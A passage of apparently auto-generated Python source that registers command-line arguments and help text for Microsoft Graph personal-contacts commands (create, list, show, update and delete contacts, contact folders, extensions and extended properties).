c.argument('file_as', type=str, help='The name the contact is filed under.')
c.argument('generation', type=str, help='The contact\'s generation.')
c.argument('given_name', type=str, help='The contact\'s given name.')
c.argument('home_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('home_phones', nargs='+', help='The contact\'s home phone numbers.')
c.argument('im_addresses', nargs='+', help='The contact\'s instant messaging (IM) addresses.')
c.argument('initials', type=str, help='The contact\'s initials.')
c.argument('job_title', type=str, help='The contact’s job title.')
c.argument('manager', type=str, help='The name of the contact\'s manager.')
c.argument('middle_name', type=str, help='The contact\'s middle name.')
c.argument('mobile_phone', type=str, help='The contact\'s mobile phone number.')
c.argument('nick_name', type=str, help='The contact\'s nickname.')
c.argument('office_location', type=str, help='The location of the contact\'s office.')
c.argument('other_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('parent_folder_id', type=str, help='The ID of the contact\'s parent folder.')
c.argument('personal_notes', type=str, help='The user\'s notes about the contact.')
c.argument('profession', type=str, help='The contact\'s profession.')
c.argument('spouse_name', type=str, help='The name of the contact\'s spouse/partner.')
c.argument('surname', type=str, help='The contact\'s surname.')
c.argument('title', type=str, help='The contact\'s title.')
c.argument('yomi_company_name', type=str, help='The phonetic Japanese company name of the contact.')
c.argument('yomi_given_name', type=str, help='The phonetic Japanese given name (first name) of the contact.')
c.argument('yomi_surname', type=str, help='The phonetic Japanese surname (last name) of the contact.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the contact. Read-only. Nullable.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contact. Read-only. Nullable.')
c.argument('photo', action=AddPhoto, nargs='+', help='profilePhoto')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactSingleValueExtendedProperties, nargs='+', help='The '
'collection of single-value extended properties defined for the contact. Read-only. Nullable.')
with self.argument_context('personalcontacts user create-contact-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('display_name', type=str, help='The folder\'s display name.')
c.argument('parent_folder_id', type=str, help='The ID of the folder\'s parent folder.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the folder. '
'Navigation property. Read-only. Nullable. Expected value: json-string/@json-file.')
c.argument('contacts', type=validate_file_or_dict, help='The contacts in the folder. Navigation property. '
'Read-only. Nullable. Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contactFolder. Read-only. Nullable.')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties, nargs='+',
help='The collection of single-value extended properties defined for the contactFolder. Read-only. '
'Nullable.')
with self.argument_context('personalcontacts user delete-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user delete-contact-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user list-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user list-contact-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user show-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user show-contact-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user update-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('assistant_name', type=str, help='The name of the contact\'s assistant.')
c.argument('birthday', help='The contact\'s birthday. The Timestamp type represents date and time information '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'')
c.argument('business_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('business_home_page', type=str, help='The business home page of the contact.')
c.argument('business_phones', nargs='+', help='The contact\'s business phone numbers.')
c.argument('children', nargs='+', help='The names of the contact\'s children.')
c.argument('company_name', type=str, help='The name of the contact\'s company.')
c.argument('department', type=str, help='The contact\'s department.')
c.argument('display_name', type=str, help='The contact\'s display name. You can specify the display name in a '
'create or update operation. Note that later updates to other properties may cause an automatically '
'generated value to overwrite the displayName value you have specified. To preserve a pre-existing '
'value, always include it as displayName in an update operation.')
c.argument('email_addresses', action=AddEmailAddresses, nargs='+', help='The contact\'s email addresses.')
c.argument('file_as', type=str, help='The name the contact is filed under.')
c.argument('generation', type=str, help='The contact\'s generation.')
c.argument('given_name', type=str, help='The contact\'s given name.')
c.argument('home_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('home_phones', nargs='+', help='The contact\'s home phone numbers.')
c.argument('im_addresses', nargs='+', help='The contact\'s instant messaging (IM) addresses.')
c.argument('initials', type=str, help='The contact\'s initials.')
c.argument('job_title', type=str, help='The contact’s job title.')
c.argument('manager', type=str, help='The name of the contact\'s manager.')
c.argument('middle_name', type=str, help='The contact\'s middle name.')
c.argument('mobile_phone', type=str, help='The contact\'s mobile phone number.')
c.argument('nick_name', type=str, help='The contact\'s nickname.')
c.argument('office_location', type=str, help='The location of the contact\'s office.')
c.argument('other_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('parent_folder_id', type=str, help='The ID of the contact\'s parent folder.')
c.argument('personal_notes', type=str, help='The user\'s notes about the contact.')
c.argument('profession', type=str, help='The contact\'s profession.')
c.argument('spouse_name', type=str, help='The name of the contact\'s spouse/partner.')
c.argument('surname', type=str, help='The contact\'s surname.')
c.argument('title', type=str, help='The contact\'s title.')
c.argument('yomi_company_name', type=str, help='The phonetic Japanese company name of the contact.')
c.argument('yomi_given_name', type=str, help='The phonetic Japanese given name (first name) of the contact.')
c.argument('yomi_surname', type=str, help='The phonetic Japanese surname (last name) of the contact.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the contact. Read-only. Nullable.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contact. Read-only. Nullable.')
c.argument('photo', action=AddPhoto, nargs='+', help='profilePhoto')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactSingleValueExtendedProperties, nargs='+', help='The '
'collection of single-value extended properties defined for the contact. Read-only. Nullable.')
with self.argument_context('personalcontacts user update-contact-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('display_name', type=str, help='The folder\'s display name.')
c.argument('parent_folder_id', type=str, help='The ID of the folder\'s parent folder.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the folder. '
'Navigation property. Read-only. Nullable. Expected value: json-string/@json-file.')
c.argument('contacts', type=validate_file_or_dict, help='The contacts in the folder. Navigation property. '
'Read-only. Nullable. Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contactFolder. Read-only. Nullable.')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties, nargs='+',
help='The collection of single-value extended properties defined for the contactFolder. Read-only. '
'Nullable.')
with self.argument_context('personalcontacts user-contact-folder create-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('display_name', type=str, help='The folder\'s display name.')
c.argument('parent_folder_id', type=str, help='The ID of the folder\'s parent folder.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the folder. '
'Navigation property. Read-only. Nullable. Expected value: json-string/@json-file.')
c.argument('contacts', type=validate_file_or_dict, help='The contacts in the folder. Navigation property. '
'Read-only. Nullable. Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contactFolder. Read-only. Nullable.')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties, nargs='+',
help='The collection of single-value extended properties defined for the contactFolder. Read-only. '
'Nullable.')
with self.argument_context('personalcontacts user-contact-folder create-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('assistant_name', type=str, help='The name of the contact\'s assistant.')
c.argument('birthday', help='The contact\'s birthday. The Timestamp type represents date and time information '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'')
c.argument('business_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('business_home_page', type=str, help='The business home page of the contact.')
c.argument('business_phones', nargs='+', help='The contact\'s business phone numbers.')
c.argument('children', nargs='+', help='The names of the contact\'s children.')
c.argument('company_name', type=str, help='The name of the contact\'s company.')
c.argument('department', type=str, help='The contact\'s department.')
c.argument('display_name', type=str, help='The contact\'s display name. You can specify the display name in a '
'create or update operation. Note that later updates to other properties may cause an automatically '
'generated value to overwrite the displayName value you have specified. To preserve a pre-existing '
'value, always include it as displayName in an update operation.')
c.argument('email_addresses', action=AddEmailAddresses, nargs='+', help='The contact\'s email addresses.')
c.argument('file_as', type=str, help='The name the contact is filed under.')
c.argument('generation', type=str, help='The contact\'s generation.')
c.argument('given_name', type=str, help='The contact\'s given name.')
c.argument('home_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('home_phones', nargs='+', help='The contact\'s home phone numbers.')
c.argument('im_addresses', nargs='+', help='The contact\'s instant messaging (IM) addresses.')
c.argument('initials', type=str, help='The contact\'s initials.')
c.argument('job_title', type=str, help='The contact’s job title.')
c.argument('manager', type=str, help='The name of the contact\'s manager.')
c.argument('middle_name', type=str, help='The contact\'s middle name.')
c.argument('mobile_phone', type=str, help='The contact\'s mobile phone number.')
c.argument('nick_name', type=str, help='The contact\'s nickname.')
c.argument('office_location', type=str, help='The location of the contact\'s office.')
c.argument('other_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('parent_folder_id', type=str, help='The ID of the contact\'s parent folder.')
c.argument('personal_notes', type=str, help='The user\'s notes about the contact.')
c.argument('profession', type=str, help='The contact\'s profession.')
c.argument('spouse_name', type=str, help='The name of the contact\'s spouse/partner.')
c.argument('surname', type=str, help='The contact\'s surname.')
c.argument('title', type=str, help='The contact\'s title.')
c.argument('yomi_company_name', type=str, help='The phonetic Japanese company name of the contact.')
c.argument('yomi_given_name', type=str, help='The phonetic Japanese given name (first name) of the contact.')
c.argument('yomi_surname', type=str, help='The phonetic Japanese surname (last name) of the contact.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the contact. Read-only. Nullable.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contact. Read-only. Nullable.')
c.argument('photo', action=AddPhoto, nargs='+', help='profilePhoto')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactSingleValueExtendedProperties, nargs='+', help='The '
'collection of single-value extended properties defined for the contact. Read-only. Nullable.')
with self.argument_context('personalcontacts user-contact-folder create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact-folder create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact-folder delete-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_folder_id1', type=str, help='key: id of contactFolder')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder delete-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder list-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder list-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder show-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_folder_id1', type=str, help='key: id of contactFolder')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder show-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder update-child-folder') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_folder_id1', type=str, help='key: id of contactFolder')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('display_name', type=str, help='The folder\'s display name.')
c.argument('parent_folder_id', type=str, help='The ID of the folder\'s parent folder.')
c.argument('child_folders', type=validate_file_or_dict, help='The collection of child folders in the folder. '
'Navigation property. Read-only. Nullable. Expected value: json-string/@json-file.')
c.argument('contacts', type=validate_file_or_dict, help='The contacts in the folder. Navigation property. '
'Read-only. Nullable. Expected value: json-string/@json-file.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactFolderMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contactFolder. Read-only. Nullable.')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactFolderSingleValueExtendedProperties, nargs='+',
help='The collection of single-value extended properties defined for the contactFolder. Read-only. '
'Nullable.')
with self.argument_context('personalcontacts user-contact-folder update-contact') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('categories', nargs='+', help='The categories associated with the item')
c.argument('change_key', type=str, help='Identifies the version of the item. Every time the item is changed, '
'changeKey changes as well. This allows Exchange to apply changes to the correct version of the '
'object. Read-only.')
c.argument('created_date_time', help='The Timestamp type represents date and time information using ISO 8601 '
'format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like this: '
'\'2014-01-01T00:00:00Z\'')
c.argument('last_modified_date_time', help='The Timestamp type represents date and time information using ISO '
'8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would look like '
'this: \'2014-01-01T00:00:00Z\'')
c.argument('assistant_name', type=str, help='The name of the contact\'s assistant.')
c.argument('birthday', help='The contact\'s birthday. The Timestamp type represents date and time information '
'using ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 would '
'look like this: \'2014-01-01T00:00:00Z\'')
c.argument('business_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('business_home_page', type=str, help='The business home page of the contact.')
c.argument('business_phones', nargs='+', help='The contact\'s business phone numbers.')
c.argument('children', nargs='+', help='The names of the contact\'s children.')
c.argument('company_name', type=str, help='The name of the contact\'s company.')
c.argument('department', type=str, help='The contact\'s department.')
c.argument('display_name', type=str, help='The contact\'s display name. You can specify the display name in a '
'create or update operation. Note that later updates to other properties may cause an automatically '
'generated value to overwrite the displayName value you have specified. To preserve a pre-existing '
'value, always include it as displayName in an update operation.')
c.argument('email_addresses', action=AddEmailAddresses, nargs='+', help='The contact\'s email addresses.')
c.argument('file_as', type=str, help='The name the contact is filed under.')
c.argument('generation', type=str, help='The contact\'s generation.')
c.argument('given_name', type=str, help='The contact\'s given name.')
c.argument('home_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('home_phones', nargs='+', help='The contact\'s home phone numbers.')
c.argument('im_addresses', nargs='+', help='The contact\'s instant messaging (IM) addresses.')
c.argument('initials', type=str, help='The contact\'s initials.')
c.argument('job_title', type=str, help='The contact’s job title.')
c.argument('manager', type=str, help='The name of the contact\'s manager.')
c.argument('middle_name', type=str, help='The contact\'s middle name.')
c.argument('mobile_phone', type=str, help='The contact\'s mobile phone number.')
c.argument('nick_name', type=str, help='The contact\'s nickname.')
c.argument('office_location', type=str, help='The location of the contact\'s office.')
c.argument('other_address', action=AddBusinessAddress, nargs='+', help='physicalAddress')
c.argument('parent_folder_id', type=str, help='The ID of the contact\'s parent folder.')
c.argument('personal_notes', type=str, help='The user\'s notes about the contact.')
c.argument('profession', type=str, help='The contact\'s profession.')
c.argument('spouse_name', type=str, help='The name of the contact\'s spouse/partner.')
c.argument('surname', type=str, help='The contact\'s surname.')
c.argument('title', type=str, help='The contact\'s title.')
c.argument('yomi_company_name', type=str, help='The phonetic Japanese company name of the contact.')
c.argument('yomi_given_name', type=str, help='The phonetic Japanese given name (first name) of the contact.')
c.argument('yomi_surname', type=str, help='The phonetic Japanese surname (last name) of the contact.')
c.argument('extensions', action=AddExtensions, nargs='+', help='The collection of open extensions defined for '
'the contact. Read-only. Nullable.')
c.argument('multi_value_extended_properties',
action=AddPersonalcontactsUserCreateContactMultiValueExtendedProperties, nargs='+', help='The '
'collection of multi-value extended properties defined for the contact. Read-only. Nullable.')
c.argument('photo', action=AddPhoto, nargs='+', help='profilePhoto')
c.argument('single_value_extended_properties',
action=AddPersonalcontactsUserCreateContactSingleValueExtendedProperties, nargs='+', help='The '
'collection of single-value extended properties defined for the contact. Read-only. Nullable.')
with self.argument_context('personalcontacts user-contact-folder update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact-folder update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact-folder-contact create-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('personalcontacts user-contact-folder-contact create-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact-folder-contact create-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', type=str, help='A property value.')
with self.argument_context('personalcontacts user-contact-folder-contact delete-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder-contact delete-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder-contact delete-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder-contact delete-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('if_match', type=str, help='ETag')
with self.argument_context('personalcontacts user-contact-folder-contact list-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact list-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact list-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('orderby', nargs='+', help='Order items by property values')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact show-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact show-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact show-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact show-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('single_value_legacy_extended_property_id', type=str, help='key: id of '
'singleValueLegacyExtendedProperty')
c.argument('select', nargs='+', help='Select properties to be returned')
c.argument('expand', nargs='+', help='Expand related entities')
with self.argument_context('personalcontacts user-contact-folder-contact update-extension') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('extension_id', type=str, help='key: id of extension')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
with self.argument_context('personalcontacts user-contact-folder-contact update-multi-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('multi_value_legacy_extended_property_id', type=str, help='key: id of '
'multiValueLegacyExtendedProperty')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('value', nargs='+', help='A collection of property values.')
with self.argument_context('personalcontacts user-contact-folder-contact update-photo') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
c.argument('id_', options_list=['--id'], type=str, help='Read-only.')
c.argument('height', type=int, help='The height of the photo. Read-only.')
c.argument('width', type=int, help='The width of the photo. Read-only.')
with self.argument_context('personalcontacts user-contact-folder-contact update-single-value-extended-property') as c:
c.argument('user_id', type=str, help='key: id of user')
c.argument('contact_folder_id', type=str, help='key: id of contactFolder')
c.argument('contact_id', type=str, help='key: id of contact')
